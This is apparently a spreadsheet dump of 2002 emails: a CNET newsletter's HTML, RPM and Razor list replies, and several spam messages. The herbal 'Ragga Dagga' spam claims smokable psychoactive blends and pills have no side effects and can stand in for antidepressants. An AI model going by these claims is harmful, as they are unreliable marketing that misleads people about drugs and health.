 								&lt;font face="arial, helvetica" size="-1" &gt;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZDjZdiE3TDtZs6swzdON9R" &gt;&lt;B&gt;HP Pavilion n5450 &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Pentium III 850MHz&lt;BR&gt;
 								&amp;#149; 128MB RAM, 20GB hard drive&lt;BR&gt;
 								&amp;#149; 15-inch TFT active matrix &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$1,099&lt;/font&gt;    &lt;/B&gt;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href="http://clickthru.online.com/Click?q=be-B7ixQCpFUr1x-WSbnY9y52GfwHRR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8209894_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;&lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJP46HpXx6GK74p01K7fy3FR" &gt;&lt;B&gt;Gateway Solo 1450SE&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Intel Celeron 1.2GHz&lt;BR&gt;
 								&amp;#149; 128MB RAM, 20GB hard drive&lt;BR&gt;
 								&amp;#149; 14.1-inch TFT active matrix &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$1,158&lt;/font&gt;    &lt;/B&gt;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&lt;p&gt;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ChannelOnline's StoreSite enables you to
 set up a private storefront with your company name and logo
 in less than an hour?
 &lt;P&gt;
 Your customers can view quotes you have created for them,
 search the product database, build their own quotes based
 on the pricing you've predetermined for them, and place
 orders with you online, 24/7.
 &lt;P&gt;
 Sign up now to give your customers a whole new level of
 service.
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfkjp_ozf0irAP_kMFIM559R" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;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href="http://clickthru.online.com/Click?q=fd-BXDMQgOQ_lZUVP_O_Iti64Q9t8uR" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-c6lyiXKF-pEvKY-qkCKsR" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI14ReUdusSkMRUVolYrBZR" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbza6XTB4JlvwlGWUTnaNtuR" &gt;Shopping&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJ9IRqzZtcMWz8AtIQwjjsR" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEkRnQusxlWhKPAKa1CPIPR" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWXNNbyBTgfLHDx1984BOnR" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzVc_Ona6eMzb-Byo4hJdcR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUpLIU6CCTOvAKcnvjbgwRR" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZpCMY-TF_RaT-Dc13yE_FR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWTQ2m2nLD7c7YuNDxuyC9R" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyslCGvgwEjnbcumX6cvbuR" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO1bOM0ZOetvDA4oSMpoLsR" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9Ns0-c1xIHPffACEH5fCA9R" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=25-inepIbdc-LJ45p3ZTscR7jeQrFuR"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href="http://clickthru.online.com/Click?q=3a-QAmgIrzkj150mnv7JR1rqAFZcCsR" &gt;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HREF='http://clickthru.online.com/Click?q=4f-Ian4zqU4_vVwG2YYOpn8w1H10aI2OsRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://www.cnet.com/subscription/0-16335-7-8494915.html?EmailAddr=qqqqqqqqqq-cnet-newsletters@example.com'&gt;Change e-mail format&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLecuwWdQiNGWF8w6YrPhnR" &gt;Change e-mail address&lt;/A&gt;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBe5mNic4QmFz_e0CvgparR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCnqnX6YMi_PDuYWD0V_WyRR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=a4-HGTsQ6p4mTC1OlG463LvvI2rgYdR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-B4MTxVB-Ah8FdMkmoOwzcR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsHsEkKDSe3ufz1Jey2fPRR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e3-ze2WQkVDQ-74YLG-JM2mPpt29eFR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfscKT48FWopiaRL6DCwol9R" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr1Rb7GC2tNv0T0QkY6b7uR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e439&amp;ISSUE=2002-07-19" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=23-sFrGnHM-nMZ1nOWQ3gj6tud1jRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: RPM's %post, %postun etc
</t>
  </si>
  <si>
    <t xml:space="preserve">Have you tried rebuilding your package on a system that has a stock (or
 no) .rpmmacros file? Does it still build (and install/uninstall) the way
 you intended it to?
 On Tue, 2002-08-20 at 09:38, Torsten Bronger wrote:
 &gt; Halloechen!
 &gt; 
 &gt; At the moment I create an RPM that also adds some files to
 &gt; teTeX's texmf/ tree.
 &gt; 
 &gt; Therefore I defined in my .rpmmacros a %texhash that
 &gt; calls texhash if it exists and in the spec file
 &gt; 
 &gt; %post
 &gt; %{texhash}
 &gt; 
 &gt; %postun
 &gt; %{texhash}
 &gt; 
 &gt; But this is a costly operation.  Is it nevertheless worth it?
 &gt; In particular, if this RPM is installed together with (very many)
 &gt; others, are those %pre, %post etc. skipped and an 'omnipotent' 
 &gt; script called that e.g. updates TeX's file database?
 &gt; 
 &gt; Tschoe,
 &gt; Torsten.
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Udhay Shankar N wrote:
  &gt; Heh. The name of the band is SO appropriate...:)
 LOL, literally, actually. :-)
  &gt; And I, get sick when I'm around, I, can't stand to be around I, hate
  &gt; everything about you!
 One of my favorite pieces of graffti that I have spotted was at UCI,
 and it read:
      I am sick when I think of Jesus
 It has so many meanings, and so many of them are disturbing, especially
 to a former good little Catholic boy like me.
 - Joe
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] when aggregator?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 20, 2002 at 05:47:54PM +0100, Matt Bernstein wrote:
 &gt; http://razor.sourceforge.net/docs/whatsnew.html says "Aggregator will be 
 &gt; released with the next major release of Razor2 agents." I was told "soon" 
 &gt; several months ago--has it stalled, or been released? If the former, can I 
 &gt; grab a development snapshot to test for you?
 &gt; 
 &gt; Matt
 The aggregator has been pushed back on the priority list because more
 important things cropped up. I can't give you an ETA on it, but it's
 very much on the TODO list.
 cheers,
 vipul.
 -- 
 Vipul Ved Prakash          |   "The future is here, it's just not 
 Software Design Artist     |    widely distributed."
 http://vipul.net/          |              -- William Gibson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</si>
  <si>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WE HAVE MORTGAGE LENDERS READY TO HELP YOU!........
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;FONT  SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;HAS YOUR MORTGAGE SEARCH GOT YOU DOWN?&lt;BR&gt;
 &lt;BR&gt;
 Win a $30,000 mortgage just for trying to get your mortgage rates down, and a little cash in your pocket!!&lt;BR&gt;
 know who is telling you the truth! We can solve all your problems.&lt;BR&gt;
 &lt;BR&gt;
 Visit our site today and in two minutes you can have us searching thousands of &lt;BR&gt;
 programs and lenders for you. Get the truth, get the facts, get your options &lt;BR&gt;
 all in one shot. It's absolutely FREE, and you can be done in only two minutes, &lt;BR&gt;
 so &lt;A HREF="http://www.zonehosts.net/yourlocallenders/index.html"&gt;Click Right NOW&lt;/A&gt; and put your worries behind you!&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/HTML&gt;
  [BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Am I This Or Not?
</t>
  </si>
  <si>
    <t xml:space="preserve">Wow, talk about a pheenomeenon
 ==
 http://www.iamcal.com/software/ami/
 AmIThisOrNot Dynamic Peer Rating System
 What is It?
 It's a tool to help you build your own "Am I X Or Not" sites.
 Where Can I Get It?
 Basic Version $20
 The basic version lets you build a specific "Am I X" site (example). The
 license covers a single installation on a single site.
 Advanced Version $40
 The advanced version lets your users create their own "Am I X" sites
 (example). The license covers a single installation on a single site.
 Installation $20
 Either version of the system can be installed on your web server, given FTP
 access and MySQL login details.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEW Pot Substitute!
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;From the ethnobotanical herbalists who brought the herba supplementals; Kathmandu Temple Kiff 1 &amp; 2 Personal-Choice, pipe-smoking products/substances to the common market!!!  
 We are finally able to offer for your Sensitive/Responsive, Personal Choice Smoking Enjoyment.the Seventh Heaven Temple 3 Ragga Dagga (TM) Pipe-Smoking Substance Supplemental Product. Introduced after three years of research and development; Temple 3 is Personal Choice legal Smoking/Indulgence.Redefined!!!  
 Thanks to recent, dramatic, technological advances in the laboratorial processes for the extraction of alkaloid and glycocide supplements from botanicals/herbas/plant matter, we are now able to offer.in more cultivated/enhanced/viripotent/substantiated format.what had actually already been the most significant, lawful, Personal Choice smoking substance available on the planet.  Seventh Heaven Temple 3 Ragga Dagga (TM) is the sweet, sweet evolution of all of that. 
 * A 20 X MORE VIRIPOTENT HERBA SUPPLEMENT THAN ITS PREDESSORS (TEMPLE 1 &amp; 2).
 * HAPPIER, HAPPY SMOKING!!!
 * INDEED, A DEPRESSIVE REGRESSIVE, SUPPLEMENTAL MOOD-ENHANCER.
 * MORE SOPHISTICATED, UPLIFTING &amp; POISED THAN ILLEGAL SMOKING  SUBSTANCES.
 * NO REGULATION, NO ILLEGALITY, NO FAILED DRUG TESTS!!!
 * INHIBITS STRESS AND ANXIETY.
 * INSPIRES CONTEMPLATIVENESS &amp; CREATIVITY.
 * ENHANCES THE SEXUAL EXPERIENCE!!!
 * GENERATES MORE RESTFUL SLEEP &amp; LUCID DREAMING.
 * A SIGNIFICANT HERBA / BOTANICAL SUPPLEMENT IN THE BATTLES AGAINST DRUG AND ALCOHOL DEPENDENCE!!!!
 * EASILY IGNITED &amp; STOKED.
 * SMOKES SWEETLY! 
 * ABSOLUTELY LEGAL / NON-INVASIVE / NO DOWNSIDE!!!
 * LINGERS FOR A GOOD, GOODLY WHILE!
 * POSSESSES MANY FINE GANJA VIRTUES WITH NONE OF THE NEGATIVES!!!
 * JUST A LITTLE SNIPPET / PINCH GOES A LONG, LONG WAY.JUST 4 OR 5 DRAWS OF YOUR PIPE (A traditional hand herb-pipe is included with each package of Ragga Dagga).
 Temple 3 Ragga Dagga (TM) is an exclusive, botanical/herba, proprietary; Nepalesian formulated, ultra-Sensitive/Responsive, pipe-smoking/stoking substance and is undoubtedly the most prestigious, legal offering of its sort on the planet!!!  
 So smokin/stokin potent is this cutting edge formulation, that we have even been able to establish a very happy clientele market base within the hard-core stoner arena and have made positive, happy, smoking differences in many, many lives.
 ABSOLUTELY LEGAL!  MARVELOUSLY POTENT!!
 A one-of-a-kind, proprietary amalgamation, comprised of extreme high-ratio concentrated extracts which are derived from various common and uncommon sensitive/responsive herbas primarily cultivated within and imported from the southern and eastern hemispheres; Temple 3 Ragga Dagga (TM) high-ratio factored botanical extractions are master-crafted into solid jiggets/bars which are structurally reminiscent of what one might find in the happiness coffee and tea houses of Nepal/Kathmandu/Amsterdam and in many aspects, possesses a more collected and more focused, less scattered ambiance.  
 Ingredients:
 Temple smoking substances and Temple 3 Ragga Dagga (TM) have always been and will always remain exclusive EXOTIC BOTANICAL RESOURCES House Smoking Substance Specialties.  Temple 3 Ragga Dagga (TM) is both a euphonious/celebratory and relaxing/calming pipe-smoking substance that offers both physical and cerebral significators.  Temple 3 Ragga Dagga (TM) is a proprietary, prescribed botanical amalgamation which includes the following synergistically/synesthesia conglomerated, core-refined, ratio-enhanced herbas/botanicals, resins, essences, flower-tops and oils in extreme ratio extractment ranging from 8.5 to 1, to 100 to 1 viripotent concentrations Drachasha, Chavana Prash, Trikatu, Black Seed Herb, Hybrid Flowering Turnera Diffusa, Capillaris Herba, Angelica Root, Wild Dagga mature leaf matter, Haritaki, Shatavari, Labdunum, Neroli, Unicorn Root, Papaver Rhoes, Dendrobian stems, Calea Zacalechichi buddings, Rue, Amla, Salvia Divinorum, Crocus Sativa, Lotus and Gokshu!
 ra!
  cuttings. 
 Please Note:  Temple 3 Ragga Dagga (TM) is an absolutely legal, herba/botanical, Personal Choice, pipe-smoking substantiality product!!!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Temple 3 Ragga Dagga (TM).  There is certainly no cannabis/marijuana in Temple 3 Ragga Dagga (TM).  And although we are not age-governed by law.Temple 3 Ragga Dagga (TM) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Temple 3 Ragga Dagga (TM) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  All things in their time.  As well, Temple 3 Ragga Dagga (TM) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physicians care in any regard.
 ========================================================
 Here is what our customers are saying about the Temple 3 Ragga Dagga (TM) phenomenon:
 To whom it may concern,
 I was skeptical when I first read your ad.  I grew up in the 70s &amp; 80s.  I was a hard core (alternative smoker) then.  So I knew my stuff.  But drug tests stopped that!  Now I am disabled from a degenerative muscle, ligament, and tendon disease.  I was smoking (an illegal product) for the pain and nausea.  Now I have something just as good; Temple 3, but cheaper, and it is legal!  I also have a lot of trouble sleeping, but the Capillaris Herba made into tea works and smells great!  Your products that I tried so far, are as good or better than your ads say!  That is hard to find nowadays in a company.  Who ever put this stuff together is a botanical genius.  I will be a customer for life!  Also, I talked with a lady on the phone when I was ordering, and asked her to find out if I could get my products and samples to hand out for free.  And just send the customers to you.  Or get a discount on products that I could sell retail to people.  I would prefer the earlier one becau!
 se!
 , I can just talk about your products, I am a great salesman (about 10 years experience), I could hand out flyers, give out little 1 gram pieces as samplers with your business card enclosed, etc.. I am going to be unable to work a regular job for a while, maybe indefinitely?  This deal would give me my own products and samples for free?  You would get free advertising, word of mouth, samples into peoples hands to try, someone that is very good with computers, someone who studied about mail order, Internet, cold calling, small business, good with people, etc..  I would like to be doing something, even if I would get on Social Security Disability.  It is very disheartening not being able to work to support my 2 teenage boys, or do a lot of the things I used to do!  At least I would be able to do something worthwhile.  And great products makes it real easy to sell.  Let me know what you think?
 Sincerely,
 RJ
 Location: Midwest, U.S.A.
 Thank you so much for the Ragga.  It is everything you guys claim, and then some!  I was a bit skeptical when I read your description of its effects, but there is literally no exaggeration in your advertisements.  How nice that this is non-prohibited!  It tastes great and feels great too!  I am so glad I took a chance and ordered.  Blessings to all of you.
 -- Frankie R.
 Location: West Coast, USA
 Im a man of my 40s and I really know my stuff.  I dont drink or do illegal drugs anymore and have found a much more spiritual path.  I used to have to take Valium in the past.  Not anymore with the Temple 3.  It really amazes me how this stuff tastes like the Lebanese and blonde stuff I used to smoke in the 70s.  I am very satisfied with all of your products.  I like them a lot and will be a customer for life for sure.  Whoever makes this stuff is an ARTIST at it.  Who would have thought?!  
 -- A.J.
 Location: United Kingdom
 ========================================================
 Finally, we realize of course that this Temple 3 Ragga Dagga (TM) is not inexpensive. (Temple 3 Ragga Dagga (TM) is a very, very Sweet Smoke and sweetness is never acquired inexpensively.  Such is the way of the Economic Tao....), nor, as a matter of fact, is it inexpensive for us to acquire, factor or master-craft.  Quite simply, it is the very best of its Kind that there is to be acquired.  Just a snippet/pinch of this Temple 3 Ragga Dagga (TM). Four or five draws of your pipe.as is the magical way.lingers for a good, goodly while!!!  (An herb pipe and usage instructions are included with each Temple 3 Ragga Dagga (TM) Package.)
 Seventh Heaven Temple 3 Ragga Dagga (TM) is offered exclusively in 56 gram (2 oz.) and 22 gram (.75 oz.) jiggets/bars for $115.00 and $65.00 respectively.  Sorry, no volume discounts.  Wholesale pricing is available to qualified, select merchants only.
 ************************************************************
 Our other fine herbal, botanical products include the following:
 1.  Sweet Vjestika Aphrodisia Drops (tm); An erotic aphrodisia; sexual intensifier / enhancer liquid amalgamated extract for MEN and WOMEN.
 2. "Seventh Heaven" Prosaka Tablets (tm); a botanical alternative to pharmaceutical medications for calm, balance, serenity and joyful living... 
 3. "Seventh Heaven" Gentle Ferocity Tablets (tm); a most efficacious, non-caffeine, non-ephedrine, non-MaHuang botanical energizer and cutting-edge appetite suppressant...
 4.  Extreme Martial Arts Botanical Remedies; Equivalence Tablets &amp; Dragon Wing Remedy Spray ... pain management that works to alleviate pain even for arthritis and fibromyalgia sufferers...
 *********************************************
 Sweet Vjestika Aphrodisia Drops (tm) inspires and enhances:
 * Extreme body sensitivity
 * Sensitivity to touch
 * Desire to touch and be touched
 * Fantasy, lust, rapture, erogenous sensitivity ... 
 * Prolongs and intensifies foreplay, orgasm &amp; climax
 *********************************************
 "Seventh Heaven" Prosaka Tablets ... 
 Entirely natural, proprietary, botanical prescription comprised of uncommon Asian Herbs for Calm, Balance, Serenity and Joyful Living. "Seventh Heaven" Prosaka is indeed a most extraordinary, viripotent, calming, centering, mood-enhancing, holistically-formulated, exotic herbaceous alternative to pharmaceutical medications for depression, anxiety, stress, insomnia, etc.
 NO side effects!  NO dependency!  Vivaciously Mellow!
 **********************************************
 "Seventh Heaven" Gentle Ferocity Tablets (tm) ... 
 a non-caffeine, non-ephedrine, non-ephedra, non-MaHuang; viripotent, herbaceous prescription for the dynamic energization of body, mind and spirit.  
 This Gentle Ferocity Formulation is amalgamated in accordance with the fundamental Taoist herbal principle of botanical interactiveness and precursorship which in essence is a molecular equation of the relevant botanical/herbal alkaloids and glycosides interacting with one another to prolificate molecular communion and thereby to achieve demonstrative herbal efficaciousness without negative implication to any aspect of human composition.  These Gentle Ferocity Cordial Tablets are incredulously and thoroughly effective.  Enjoy!
 For those of you who seek to achieve most demonstrative/non-invasive/non-prohibitive appetite suppression without the negative implications of ongoing usage of MaHuang Herb, Ephedra/Ephedrine or Caffeine as are so magnaminously utilized in a multitude of herbal "diet aids" entitled as "Thermogenics" ... this is ABSOLUTELY the herbal agenda/product for you!!
 Entirely Natural! Increases Energy! Increases Metabolism! Decreases Appetite!
 ***********************************************
 Extreme Martial Arts Botanical Remedies
 Eastern culture has long had a treatment for bone, muscle, tendon, ligament, sinew and joint distress, traumas, afflictions and constrictions.  We are pleased to offer 
   Equivalence Tablets  &amp;  Dragon Wing Remedy Spray
     (Hei Ping Shun)           (Hei Long Chibang)
 PLEASE NOTE:
 While it is true that all physiological traumas and injuries are unique and that no product can arbitrarily eliminate all of the pain and discomfort in all people all of the time, the combination of Equivalence Tablets (Hei Ping Shun) and Dragon Wing Remedy (Hei Long Chibang) remedial botanicals does guarantee to at the least:
 1.  Significantly reduce discomfort and pain!
 (In many instances most, if not all, traumas and distress can be eliminated!)
 2.  Significantly increase mobility and strength ratio.
 (Please remember also the significance of proper diet, excercise, rest and prayer.)
 Equivalence Tablets &amp; Dragon Wing Spray Remedials are comprised of entirely natural botanical factors.
 While Equivalence Tablets (Hei Ping Shun) and Dragon Wing Remedy Spray (Hei Long Chibang) are extremely effective individually, they are utilized to maximum advantage when used in conjunction with one another.
 ========================================================
 !!!!Please refer to Introductory Offers further on in this text featuring Temple 3 Ragga Dagga (TM) along with our other very fine Sensitive/Responsive cordial botanical products. Please enjoy!!!  Many Blessings to you all.
 ========================================================
 PRICING INFORMATION:
 1.    SEVENTH HEAVEN Seventh Heaven Temple 3 (tm)
 One     .75 oz. jigget/bar          $65.00
 One    2.0 oz. jigget/bar          $115.00 (Free Capillaris Herba with 2.0 oz. bar. Refer to Capillaris paragraph at end of text)
 2.    SWEET VJESTIKA APHRODISIA DROPS (tm)
 One	1.0 oz. bottle		$90.00   
 Two	1.0 oz. bottles	       $140.00  
 3.    SEVENTH HEAVEN PROSAKA (tm)
 One    100 tablet tin          $40.00
 Three  100 tablet tins        $105.00
 Six    100 tablet tins        $185.00
 4.    SEVENTH HEAVEN GENTLE FEROCITY (tm)
 One   300 tablet jar          $130.00
 5.    Equivalence Tablets - Each bottle contains 90 - 500mg tablets.
 **  3-pack  (270 tablets)    $83.00
 **  6-pack  (540 tablets)    $126.00 (save $40.00)
 **  9-pack  (810 tablets)    $159.00 (save $90.00)
 **  12-pack (1,080 tablets)  $192.00 (save $140.00)
 6.    Dragon Wing Spray Remedy - Each spray bottle contains 4 liquid oz.
 **  3-pack  (3 - 4 oz. bottles)     $83.00
 **  6-pack  (6 - 4 oz. bottles)     $126.00 (save $40.00)
 **  9-pack  (9 - 4 oz. bottles)     $159.00 (save $90.00)
 **  12-pack (12 - 4 oz. bottles)    $192.00 (save $140.00)
 7.    Dynamic Duo Introductory Offers 
 **  3-pack Equivalence Tabs &amp; 3-pack Dragon Wing   $126.00 (save $40.00)
 **  6-pack Equivalence Tabs &amp; 3-pack Dragon Wing   $159.00 (save $50.00)
 **  9-pack Equivalence Tabs &amp; 6-pack Dragon Wing   $215.00 (save $70.00)
 **  12-pack Equivalence Tabs &amp; 9-pack Dragon Wing  $271.00 (save $80.00)
 8.   SWEET APHRODISIA INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; one, 1 oz. bottle of Sweet Vjestika Aphrodisia Drops.  For $150.00 (Reg. $205.00  Save $55)  (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)
 9.   BODY, MIND, SPIRIT "HEAVENLY" INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka.  For $125.00 (Reg. $155.00  Save $30) (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)
 10.  "PURE ENERGY" INTRO COMBINATION OFFER 
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity.  For $170.00 (Reg. $245.00  Save $75)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text)
 11.  "SENSITIVE" PREFERENTIAL INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity For $200.00 (Reg. $285.00  Save $85)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)
 12.  ULTIMATE HERBACEOUSNESS INTRO COMBINATION OFFER
 Includes one - 2.0 oz. jigget / bar of Seventh Heaven Temple 3, one - 1 oz. bottle of Sweet Vjestika Aphrodisia Drops, one - 100 tablet tin of Prosaka, and one - 300 count jar of Gentle Ferocity for a deep discounted Retail Price of $260.00 (Reg. $375.00  Save $115)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)
 SPECIAL OFFER:  For a limited time only, you will receive a FREE personal brass hookah with the Ultimate Herbaceous Intro Offer as our gift to you.  This hookah has a retail value of $25.00. 
 **************************************************
 ORDERING INFORMATION:
 For your convenience, you can call us direct with your orders or questions.
 Call 1-623-974-2295 
 Monday - Friday -- 10:30 AM to 7:00 PM (Mountain Time)
 Saturday -- 11:00 AM to 3:00 PM (Mountain Time)
 For all domestic orders, add $5.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $20.00 for International orders.
 **************************************************
 SPECIAL DISCOUNT &amp; GIFT
 Call now and receive a FREE botanical gift!  With every order for a 2.0 oz. jigget / bar of Seventh Heaven Temple 3 or one of our four (4) Intro Combination Offers, we will include as our free gift to you ... a 2.0 oz. package of our ever so sedate, sensitive Asian import, loose-leaf Capillaris Herba for "happy" smoking or brewing ... (a $65.00 retail value).
 ====================================================
 To remove your address from our list, click "Reply" in your email software and type "Remove" in the subject field, then send.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The "Business-Owner Friendly" Pension Plan
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_4103D_01C25725.29EA69B0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  421(i) A Fully Insured, Tax Qualified Retirement Plan!=09
  	 	 	 	 =09
 $353,253*	 $145,496*	 $40,000	 $30,000	 $11,000
 =A7412(i)	 Defined Benefit	 Profit Sharing	 SEP	 401(K)	=20
  =09
  Designed For Business Owners Over Age 50=09
 ?  Contributions Are 100% Tax Deductible
 ?  US Government Approved ERISA Pension Plan Since 1974
 ?  Up To 90% of The Benefit Goes Directly To The Business Owner =09
 Make Your Client's Retirement Dreams Come True! =09
  =09
 For a personalized proposal, please call the pension department: =09
 1-800-235-7949	=20
 Or e-mail your request to us at: pensions@fsfginc.com
 &lt;mailto:pensions@fsfginc.com&gt;  =09
  =09
 =20
 " Innovative Solutions For Changing Economic Climates" =09
 Please fill out the form below for more information	=20
 Name:	 	=20
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	  =09
  	    =09
 =20
  =09
 1-800-235-7949   Fax: 856-596-9309
 pensions@fsfginc.com &lt;mailto:pensions@fsfginc.com&gt;     www.fsfginc.com
 &lt;http://www.fsfginc.com&gt;  =09
  American National Independent Marketing=09
 * Assumes 55 year old making a maximum tax deductible contribution.
 We don't want anybody to receive our mailings who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.InsuranceIQ.com/optout
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt;=20
 ------=_NextPart_000_4103D_01C25725.29EA69B0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;title&gt;The "Business-Owner Friendly" Pension Plan&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"1" width=3D"550" cellspacing=3D"0" cellpadding=3D"0" =
